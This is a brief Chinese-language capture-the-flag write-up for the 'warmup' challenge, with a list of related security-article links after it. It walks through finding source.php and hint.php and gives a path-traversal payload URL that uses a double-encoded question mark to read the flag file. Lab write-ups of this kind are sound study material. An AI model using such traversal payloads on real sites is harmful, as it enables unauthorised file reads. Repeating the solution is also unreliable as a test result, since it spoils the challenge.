攻防世界-warmup

原题解题思路

只有一张图片,就查看源代码,有一个source.php。

查看source.php,白名单中还有一个hint.php。

hint.php告诉我们flag的位置ffffllllaaaagggg

但是直接跳转是没用的,构造payload。

复制代码
http://61.147.171.105:55725/source.php?file=source.php%253f/../../../../../../ffffllllaaaagggg
相关推荐
汤愈韬6 小时前
知识点3:动态目的NAT的配置总结
网络·网络协议·网络安全·security·huawei
漏洞文库-Web安全9 小时前
Linux逆向学习记录
linux·运维·学习·安全·web安全·网络安全·逆向
浩浩测试一下10 小时前
C&&汇编中的调用约定
大数据·汇编·安全·web安全·网络安全·系统安全
雪影风痕10 小时前
华为安全防火墙部署
服务器·网络协议·tcp/ip·网络安全
-曾牛12 小时前
CSRF跨站请求伪造:原理、利用与防御全解析
前端·网络·web安全·网络安全·渗透测试·csrf·原理解析
介一安全12 小时前
【Frida Android】实战篇11:企业常用加密场景 Hook(1)
android·网络安全·逆向·安全性测试·frida
三七吃山漆12 小时前
攻防世界——supersqli
数据库·网络安全·web·ctf
Whoami!13 小时前
❽⁄₁ ⟦ OSCP ⬖ 研记 ⟧ 修改漏洞利用脚本 ➱ 缓冲区 & 栈结构
网络安全·信息安全·漏洞利用·缓冲区溢出
白帽子黑客杰哥13 小时前
零基础系统学习渗透测试:2025年详尽路线图
网络安全·就业·护网行动·网络安全工程师·实战演练·报班
扣脚大汉在网络13 小时前
CVE-2025-55182 React反序列化漏洞复现
网络安全